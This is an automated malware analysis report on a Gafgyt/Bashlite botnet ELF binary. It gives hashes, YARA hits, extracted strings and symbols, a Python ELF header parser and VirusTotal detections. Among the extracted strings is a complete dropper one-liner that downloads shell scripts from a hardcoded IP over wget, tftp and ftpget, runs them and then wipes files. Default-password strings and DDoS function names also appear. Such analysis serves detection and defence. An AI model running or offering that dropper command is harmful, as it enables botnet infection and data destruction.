Report #768


Binary

ABI ELFOSABI_SYSV

Size 73.81KB

Type ET_EXEC

trid 50.1% ELF Executable and Linkable format, 49.8% ELF Executable and Linkable format

type ELF

Wordsize 32

Architecture x86

Hashes

md5 08c3bf87ff0a26ac3e65f10ff1516655

sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa

crc32 0x391a74f7

sha224 fdd8ee63366209b306a2414b070bf995c6ed84777139559cd682efa5

sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f

sha384 bee304b66f5f99cc1b164a88ad86c467c3929b2b9d6efc625efae4459e620ee16f3098bba81560b80ab9f10bacfa1022

sha512 2c3bed47ea246e930bbf8a6b45b4e47d3586ae2a77d16640e6fc288695714b8a02fe55937d501960fe852b85b7025ea019b993c36ec0613d01eab8f447b26a6d

ssdeep 1536:xyq93lguLYiPvoVjRWSbXJ0rWlC/kPstVkYFWw23fQW83LZ5:p3KwYiPvoVjRWSbLQ/kPstVkjw2IN

Community

Report #768

Creation Date: Oct. 19, 2019, 5:05 p.m.

Last Update: Oct. 19, 2019, 5:05 p.m.

File:

0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f

Results:

Google False

HashLib False

YARA

Matches maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious True

Dwarf

List

Number 0

Files

Sys Home

Proc /proc/cpuinfo, /proc/net/route

Password

Suspicious True

Flags

Flags 0

Packer

List None

Packed False

Network

IPs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, 104.238.165.76:23

URLs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

Mails

Suspicious True

Strings

List

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
104.238.165.76:23
.got.plt
Network is down
Machine is not on the network
No route to host
Host is down
been_there_done_that.3001
been_there_done_that
_fwrite.c
open.c
write.c
Transport endpoint is not connected
No such process
Block device required
Remote address changed
No such device or address
Operation now in progress
Is a named type file
Connection reset by peer
Too many links
Too many open files
Link has been severed
Object is remote
Too many open files in system
No such device
REPORT %s:%s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
My IP: %s
Invalid flag "%s"
8.8.8.8
BUILD %s
BUILD %s
Too many users
__GI_execl
__GI_fflush_unlocked
PONG!
__libc_nanosleep
__GI_sleep
__socketcall
__GI_execve
__register_frame_info_bases
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
__socketcall.c
fflush_unlocked
socket.c
__GI_socket
sleep.c
sendHTTP
tcpcsum
PONG
HTTP
commServer
pipe.c
Software caused connection abort
Socket operation on non-socket
inet_addr
currentServer
Identifier removed
Interrupted system call should be restarted
Operation already in progress
Address family not supported by protocol
Too many references: cannot splice
makeIPPacket
usernames
Transport endpoint is already connected
KILLATTK
random_poly_info
random.c
random_r
changeme
Permission denied
nanosleep
srandom_r
__GI_random_r
password
sendTCP
Too many levels of symbolic links
Can not access a needed shared library
fwrite_unlocked
Not a XENIX named type file
processCmd
random_r.c
Exec format error
__GI_srandom_r
Protocol driver not attached
passwords
Attempting to link in too many shared libraries
getHost
Network dropped connection on reset
__GI_random
vfprintf
Name not unique on network

Symbols

List libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4252, printchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, printf.c, popen.c, mylock, popen_list, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, vfprintf.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, fclose.c, fdopen.c, _WRITE.c, _fopen.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fflush_unlocked.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, raise.c, dl-support.c, brk.c, fseeko.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, rawmemchr.c, strspn.c, llseek.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, popen, sysconf, printf, stdout, random, __GI_getpagesize, getdtablesize, __GI_h_errno, __GI___ctype_toupper, recv, connect, __GI___uClibc_fini, numpids, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, __GI_setsid, sendTCP, pclose, __bsd_signal, __GI_strpbrk, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, __ctype_b, __GI_random_r, usernames, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __libc_nanosleep, trim, dup2, __pthread_mutex_init, getuid, system, malloc, isatty, sleep, __GI_atol, __GI_read, random_r, __dso_handle, clock_getres, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, write, environ, __GI_close, getBuild, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_brk, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, setstate, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, getCores, __GI_memcpy, wcsrtombs, _stdio_user_locking, strncpy, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI_getrlimit, __GI_strcpy, strtok, __stdio_adjust_position, malloc_trim, fdopen, _vfprintf_internal, fork, gotIP, __GI_sleep, sigaction, _dl_phdr, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, __bss_start, __libc_open, getOurIP, memset, __GI_socket, main, __glibc_strerror_r, listFork, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, time, __libc_system, __GI_abort, fdpopen, __stdio_init_mutex, __GI__exit, data_start, __GI_sysconf, __h_errno_location, matchPrompt, __C_ctype_b_data, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, __GI_waitpid, _stdio_term, __GI_vfprintf, __GI_signal, stderr, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __GI_printf, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, initstate_r, __GI_connect, __curbrk, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, brk, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_del_lock, __GI_inet_aton, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __GI_strnlen, _Jv_RegisterClasses, infectline, macAddress, __GI___errno_location, readUntil, fcntl, __GI_fdopen, __GI_atoi, fseeko64, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, sendHOLD, mainCommSock, pids, sendCNC, vfprintf, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname

Number 624


Reason None

Suspicious False

Version

Version EV_CURRENT

Foremost

Matches None

Suspicious False

Sections

List , .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, . comment, .shstrtab, .symtab, .strtab

Number 16

Suspicious False

Segments

Number 3

Suspicious False

Compilers

List GCC: (GNU) 4.1.2 (the same string repeated 133 times, one .comment entry per linked object)

Identified 133

Suspicious True

Functions

List (identical to the Symbols list above; the extractor emitted an empty entry between each pair of names)

Present True

Anti-Debug

Ptrace False

Anti-disasm False

Entry Point

Address 0x8048168

Suspicious False

Embedded ELF

List None

Identified 0

Program Header

Size 32

Number 3

Offset 52


Section Header

Size 40

Number 16

Offset 57640
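The Binary, Entry Point, Program Header and Section Header fields above are read straight from the 52-byte Elf32_Ehdr at the start of the file: the program header table starts at offset 52 because that is where the ELF header ends, and the entry sizes 32 and 40 are sizeof(Elf32_Phdr) and sizeof(Elf32_Shdr). The following Python is an added example, not code from the report's tooling. It builds a header carrying this sample's values (constructed bytes, not bytes taken from the sample; e_shstrndx=13 is assumed from the position of .shstrtab in the section list), parses it back with the sanity checks a loader-confusion sample would trip, and checks that both header tables fit inside the file size the report gives.

```python
import struct
from collections import namedtuple

# Elf32_Ehdr layout (little-endian): e_ident[16], e_type, e_machine, e_version,
# e_entry, e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum,
# e_shentsize, e_shnum, e_shstrndx.
ELF32_EHDR_FMT = "<16sHHIIIIIHHHHHH"
ELF32_EHDR_SIZE = struct.calcsize(ELF32_EHDR_FMT)   # 52, which is why e_phoff is 52 here
ELF32_PHDR_SIZE = 32
ELF32_SHDR_SIZE = 40

ET_NAMES = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
EM_NAMES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64"}
OSABI_NAMES = {0: "ELFOSABI_SYSV", 3: "ELFOSABI_LINUX"}

ElfHeader = namedtuple(
    "ElfHeader",
    "wordsize osabi type machine entry phoff phentsize phnum shoff shentsize shnum shstrndx",
)


def build_sample_header():
    """Constructed header reproducing this report's values (not bytes from the sample)."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # ELFCLASS32, ELFDATA2LSB, EV_CURRENT, SYSV
    return struct.pack(
        ELF32_EHDR_FMT, e_ident,
        2,             # e_type      ET_EXEC
        3,             # e_machine   EM_386
        1,             # e_version   EV_CURRENT
        0x8048168,     # e_entry
        52,            # e_phoff
        57640,         # e_shoff
        0,             # e_flags
        52, 32, 3,     # e_ehsize, e_phentsize, e_phnum
        40, 16, 13,    # e_shentsize, e_shnum, e_shstrndx (13 = .shstrtab, assumed)
    )


def parse_elf32(blob):
    """Parse an ELF32 little-endian header; raise ValueError on anything else."""
    if len(blob) < ELF32_EHDR_SIZE or blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data, ei_version, ei_osabi = blob[4], blob[5], blob[6], blob[7]
    if ei_class != 1 or ei_data != 1:
        raise ValueError("only ELFCLASS32 / ELFDATA2LSB handled here")
    if ei_version != 1:
        raise ValueError("unexpected EI_VERSION")
    (_, e_type, e_machine, _, e_entry, e_phoff, e_shoff, _,
     e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
     e_shstrndx) = struct.unpack_from(ELF32_EHDR_FMT, blob)
    # A wrong e_ehsize or entry size is a classic trick for confusing parsers
    # and loaders, so refuse the file rather than guess.
    if e_ehsize != ELF32_EHDR_SIZE:
        raise ValueError(f"e_ehsize {e_ehsize} != {ELF32_EHDR_SIZE}")
    if e_phnum and e_phentsize != ELF32_PHDR_SIZE:
        raise ValueError(f"e_phentsize {e_phentsize} != {ELF32_PHDR_SIZE}")
    if e_shnum and e_shentsize != ELF32_SHDR_SIZE:
        raise ValueError(f"e_shentsize {e_shentsize} != {ELF32_SHDR_SIZE}")
    return ElfHeader(
        32, OSABI_NAMES.get(ei_osabi, f"osabi_{ei_osabi}"),
        ET_NAMES.get(e_type, f"type_{e_type}"), EM_NAMES.get(e_machine, f"machine_{e_machine}"),
        e_entry, e_phoff, e_phentsize, e_phnum, e_shoff, e_shentsize, e_shnum, e_shstrndx,
    )


def table_problems(hdr, file_size):
    """Return findings for header tables that do not fit inside file_size."""
    problems = []
    ph_end = hdr.phoff + hdr.phentsize * hdr.phnum
    sh_end = hdr.shoff + hdr.shentsize * hdr.shnum
    if hdr.phnum and ph_end > file_size:
        problems.append(f"program header table ends at {ph_end} > file size {file_size}")
    if hdr.shnum and sh_end > file_size:
        problems.append(f"section header table ends at {sh_end} > file size {file_size}")
    if hdr.shnum and hdr.shstrndx >= hdr.shnum:
        problems.append(f"e_shstrndx {hdr.shstrndx} out of range")
    return problems


if __name__ == "__main__":
    hdr = parse_elf32(build_sample_header())
    print(hdr)
    print(table_problems(hdr, 75_581) or "header tables fit")   # 73.81 KB as given in the report
```

With the report's numbers the section header table ends at 57640 + 16 * 40 = 58280, comfortably inside a 73.81 KB file; a stripped or truncated sample would fail the same check, which is the point of running it before trusting the section list.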

AVclass

gafgyt 1

VirusTotal

md5 08c3bf87ff0a26ac3e65f10ff1516655

sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa

SCANS (DETECTION RATE = 62.71%)

Engine | Detected | Result | Update | Version
AVG | True | ELF:DDoS-Y [Trj] | 20170807 | 8.0.1489.320
CMC | False | | 20170805 | 1.1.0.977
MAX | True | malware (ai score=80) | 20170807 | 2017.6.26.1
Bkav | False | | 20170807 | 1.3.0.9282
K7GW | False | | 20170807 | 10.20.24212
ALYac | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 | 20170807 | 1.1.1.2
Avast | True | ELF:DDoS-Y [Trj] | 20170807 | 8.0.1489.320
Avira | True | DDOS/LNX.Lightaidra.ljbci | 20170807 | 8.3.3.4
Baidu | False | | 20170807 | 1.0.0.2
Cyren | True | ELF/Backdoor.UFDH- | 20170807 | 5.4.30.7
DrWeb | True | Linux.BackDoor.Fgt.373 | 20170807 | 7.0.28.2020
GData | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 | 20170807 | A:25.13734B:25.10170
Panda | False | | 20170807 | 4.6.4.2
VBA32 | False | | 20170803 | 3.12.26.4
VIPRE | False | | 20170807 | 60118
Zoner | False | | 20170807 | 1.0
AVware | False | | 20170807 | 1.5.0.42
ClamAV | True | Unix.Trojan.Gafgyt-111 | 20170807 | 0.99.2.0
Comodo | True | UnclassifiedMalware | 20170807 | 27567
F-Prot | False | | 20170807 | 4.7.1.166
Ikarus | True | Trojan.Linux.Gafgyt | 20170807 | 0.1.5.2
McAfee | True | RDN/Generic BackDoor | 20170807 | 6.0.6.653
Rising | True | Backdoor.Gafgyt/Linux!1.A512 (classic) | 20170807 | 25.0.0.1
Sophos | True | Linux/DDoS-BI | 20170807 | 4.98.0
Yandex | False | | 20170801 | 5.5.1.3
Zillya | False | | 20170806 | 2.0.0.3355
Arcabit | True | Trojan.Backdoor.Linux.Gafgyt.1 | 20170807 | 1.0.0.817
Tencent | True | Linux.Backdoor.Gafgyt.Hpb | 20170807 | 1.0.0.1
ViRobot | False | | 20170807 | 2014.3.20.0
Webroot | False | | 20170807 | 1.0.0.207
Ad-Aware | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 | 20170807 | 3.0.3.1010
AegisLab | True | Backdoor.Linux.Gafgyt!c | 20170807 | 4.2
Emsisoft | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 (B) | 20170807 | 4.0.1.883
F-Secure | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 | 20170807 | 11.0.19100.45
Fortinet | True | Linux/Gafgyt.B!tr | 20170807 | 5.4.247.0
Jiangmin | True | Backdoor.Linux.gbi | 20170807 | 16.0.100
Kingsoft | False | | 20170807 | 2013.8.14.323
Symantec | True | Linux.Lightaidra | 20170807 | 1.4.0.0
nProtect | False | | 20170807 | 2017-08-07.02
AhnLab-V3 | True | Linux/Gafgyt.Gen | 20170807 | 3.9.2.18278
Antiy-AVL | True | Trojan[Backdoor]/Linux.Gafgyt.f | 20170807 | 3.0.0.1
Kaspersky | True | HEUR:Backdoor.Linux.Gafgyt.ac | 20170807 | 15.0.1.13
Microsoft | True | DDoS:Linux/Lightaidra | 20170807 | 1.1.14003.0
Qihoo-360 | True | Win32/Backdoor.263 | 20170807 | 1.0.0.1120
TheHacker | False | | 20170806 | 6.8.0.5.1813
ZoneAlarm | True | HEUR:Backdoor.Linux.Gafgyt.ac | 20170807 | 1.0
ESET-NOD32 | True | a variant of Linux/Gafgyt.C | 20170807 | 15873
TrendMicro | True | ELF_BASHLITE.SMC | 20170807 | 9.862.0.1074
WhiteArmor | False | | 20170731 |
BitDefender | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 | 20170807 | 7.2
K7AntiVirus | False | | 20170807 | 10.20.24214
Malwarebytes | False | | 20170807 | 2.1.1.1115
TotalDefense | False | | 20170807 | 37.1.62.1
CAT-QuickHeal | True | Exploit.Linux.Shellshock.A | 20170807 | 14.00
NANO-Antivirus | True | Trojan.Unix.Gafgyt.eikqfj | 20170807 | 1.0.94.18103
MicroWorld-eScan | True | Gen:Variant.Backdoor.Linux.Gafgyt.1 | 20170807 | 12.0.250.0
SUPERAntiSpyware | False | | 20170807 | 5.6.0.1032
McAfee-GW-Edition | True | RDN/Generic BackDoor | 20170807 | v2015
TrendMicro-HouseCall | True | ELF_BASHLITE.SMC | 20170807 | 9.950.0.1006

total 59

sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f

scan_id 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f-1502107407

resource 08c3bf87ff0a26ac3e65f10ff1516655

permalink https://www.virustotal.com/file/0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f/analysis/1502107407/

positives 37

scan_date 2017-08-07 12:03:27

verbose_msg Scan finished, information embedded

response_code 1

Binary

RF confidence: 100.00%

suspicious: True

MLP confidence: 99.98%

suspicious: True

SVM confidence: 98.80%

suspicious: True
